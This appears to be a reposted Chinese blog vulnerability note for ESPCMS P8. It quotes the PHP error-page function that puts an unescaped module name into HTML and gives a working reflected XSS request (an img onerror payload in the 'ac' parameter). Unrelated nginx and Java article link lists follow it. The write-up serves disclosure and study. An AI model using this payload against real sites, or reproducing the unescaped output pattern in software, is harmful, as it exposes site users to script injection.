Download the source code first

In the directory espcms_web\espcms_load.php line 67

if (!is_file($module_filename)) {

    espcms_message_err('public_pack-espcms_module_file_err', array($ac_name));

}

Will return the html code directly

function espcms_message_err($message_code, $format_code = array()) {

    $title = espcms_lan_pack('public_pack-espcms_soft_title_err');

    $message_lan = espcms_lan_pack($message_code);

    if (isset($message_lan) && !empty($message_lan) && is_array($format_code) && count($format_code) > 0) {

        $message = vsprintf($message_lan, $format_code);

    } else {

        $message = $message_lan;

    }

    $message_html_code = '<!DOCTYPE html>

    <html xmlns="http://www.w3.org/1999/xhtml" dir=\'ltr\'>

    <head>

        <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

        <title>' . $title . '</title>

        <script type="text/javascript" src="' . ESPCMS_ADMIN_URL . 'js/jquery.min.js"></script>

        <script type="text/javascript" src="' . ESPCMS_ADMIN_URL . 'js/iframeResizer.contentWindow.min.js"></script>

        <style type="text/css">

            html {

                background: #eee;

            }

            body {

                background: #fff;

                color: #333;

                font-family: "Open Sans", sans-serif;

                margin: 2em auto;

                padding: 20px;

                max-width: 92%;

                -webkit-box-shadow: 0 1px 3px rgba(0,0,0,0.13);

                box-shadow: 0 1px 3px rgba(0,0,0,0.13);

            }

            h1 {

                border-bottom: 1px solid #dadada;

                clear: both;

                color: #666;

                font: 24px "Open Sans", sans-serif;

                margin: 30px 0 0 0;

                padding: 0;

                padding-bottom: 7px;

            }

            #error-page {

                margin-top:40px;

            }

            #error-page p {

                font-size: 14px;

                line-height: 1.5;

                margin: 25px 0 20px;

            }

            #error-page code {

                font-family: Consolas, Monaco, monospace;

            }

            ul li {

                margin-bottom: 10px;

                font-size: 14px ;

            }

            a {

                color: #333;

                text-decoration: underline;

            }

            a:hover {

                color: #fa0000;

                text-decoration: underline;

            }

            .button {

                background: #f7f7f7;

                border: 1px solid #cccccc;

                color: #555;

                display: inline-block;

                text-decoration: none;

                font-size: 13px;

                line-height: 26px;

                height: 28px;

                margin: 0;

                padding: 0 10px 1px;

                cursor: pointer;

                -webkit-border-radius: 3px;

                -webkit-appearance: none;

                border-radius: 3px;

                white-space: nowrap;

                -webkit-box-sizing: border-box;

                -moz-box-sizing:    border-box;

                box-sizing:         border-box;

                -webkit-box-shadow: inset 0 1px 0 #fff, 0 1px 0 rgba(0,0,0,.08);

                box-shadow: inset 0 1px 0 #fff, 0 1px 0 rgba(0,0,0,.08);

                vertical-align: top;

            }

            .button.button-large {

                height: 29px;

                line-height: 28px;

                padding: 0 12px;

            }

            .button:hover,

            .button:focus {

                background: #fafafa;

                border-color: #999;

                color: #222;

            }

            .button:focus  {

                -webkit-box-shadow: 1px 1px 1px rgba(0,0,0,.2);

                box-shadow: 1px 1px 1px rgba(0,0,0,.2);

            }

            .button:active {

                background: #eee;

                border-color: #999;

                color: #333;

                -webkit-box-shadow: inset 0 2px 5px -3px rgba( 0, 0, 0, 0.5 );

                box-shadow: inset 0 2px 5px -3px rgba( 0, 0, 0, 0.5 );

            }

            code {

                font-size:14px;padding:0px 5px;color:#eb3609;

            }

        </style>

    </head>

    <body id="error-page">' . $message . '</body></html>';

    exit($message_html_code);

}

Directly cause cross-site scripting

We request directly

http://127.0.0.1/espcms/index.php?ac=<img src=1 onerror=alert(1)>&at=List

ESPCMS P8 stable version Front-end reflective xss的更多相关文章

  1. nginx的Mainline version、Stable version、Legacy version

    Nginx官网提供了三个类型的版本Mainline version:Mainline 是 Nginx 目前主力在做的版本,可以说是开发版Stable version:最新稳定版,生产环境上建议使用的版 ...

  2. nginx的MainLine version、Stable version、Legacy versions

    Nginx的版本说明Mainline version:在线版本,正处于开发状态Stable version :稳定版本(一般下载使用)Legacy version :遗留版本,遗留的老的版本 Linu ...

  3. nginx的Mainline version、Stable version、Legacy version的版本区别

    nginx的Mainline version.Stable version.Legacy version的版本区别 创建时间:2014-01-16 10:30:37最后修改:2014-09-23 20 ...

  4. Thymeleaf 3.0.9.RELEASE is the current stable version. It requires Java SE 6 or newer.

    Thymeleaf 3.0.9.RELEASE is the current stable version. It requires Java SE 6 or newer. Release date: ...

  5. espcms P8.19082801 vulnerability

    author: naiquan chai Net name:Hanamizuki花水木 Through  the vulnerability  we can get the webshell if w ...

  6. 编译安装redis-3.2.9(latest stable version)

    What is the Redis? Redis is an open source (BSD licensed), in-memory data structure store, used as a ...

  7. Mainline/Stable/Legacy

    Nginx官网提供了三个类型的版本Mainline version:Mainline 是 Nginx 目前主力在做的版本,可以说是开发版Stable version:最新稳定版,生产环境上建议使用的版 ...

  8. 一个新的Android Studio 2.3.3可以在稳定的频道中使用。A new Android Studio 2.3.3 is available in the stable channel.

    作者:韩梦飞沙 Author:han_meng_fei_sha 邮箱:313134555@qq.com E-mail: 313134555 @qq.com 一个新的Android Studio 2.3 ...

  9. Nginx官方版本说明##Mainline &Stable&Legacy versions

    Nginx (Mainline Stable Legacy)区别 Nginx官网提供了三个类型的版本Mainline version:Mainline 是 Nginx 目前主力在做的版本,可以说是开发 ...

随机推荐

  1. 基于webpack实现多html页面开发框架三 图片等文件路径替换、并输出到打包目录

    一.解决什么问题      1.图片路径替换.并输出到打包目录      2.输出目录清理 二.需要安装的包 file-loader:html.css中图片路径替换,图片输出到打包目录:命令:npm ...

  2. Springboot整合webservice

    Springboot整合webservice 2019-12-10 16:34:42 星期二 WebService是什么 WebService是一种跨编程语言和跨操作系统平台的远程调用技术,服务之间的 ...

  3. vars()

    返回一个字典,包含所有在本函数调用时存在的变量

  4. SpringBoot添加热部署

    一.导入依赖 <!--热部署--> <dependency> <groupId>org.springframework.boot</groupId> & ...

  5. java之面向对象

    类的语法格式 public class Person{ //属性类的成员变量可以先声明,不用初始化,类成员变量具有初始值 String name; int age; //方法 public void ...

  6. SPOJ Distanct Substrings(求不同子串的数量)

    Given a string, we need to find the total number of its distinct substrings. Input T- number of test ...

  7. CoderForces999B- Reversing Encryption

    time limit per test 1 second memory limit per test 256 megabytes input standard input output standar ...

  8. wow钓鱼方案

    最近怀旧服启动了 玩(排)得我萎靡不堪 突然想起多年前写过一个钓鱼的按键精灵 赶紧搜出来助我一臂之力 奈何往年不知其珍贵 早不见了 千思万想才在群空间的文件夹内翻出来一个exe版本 而源代码已不知去向 ...

  9. 【Vuejs】269- 提升90%加载速度——vuecli下的首屏性能优化

    前言 之前用 ,所以接下来还会介绍一些它们在优化上的异同 分析 vuecli 2.x自带了分析工具只要运行 npm run build --report 如果是 vuecli 3的话,先安装插件 cn ...

  10. poj 1062 昂贵的聘礼 (有限制的最短路)

    昂贵的聘礼 Time Limit: 1000MS   Memory Limit: 10000K Total Submissions: 56594   Accepted: 17083 Descripti ...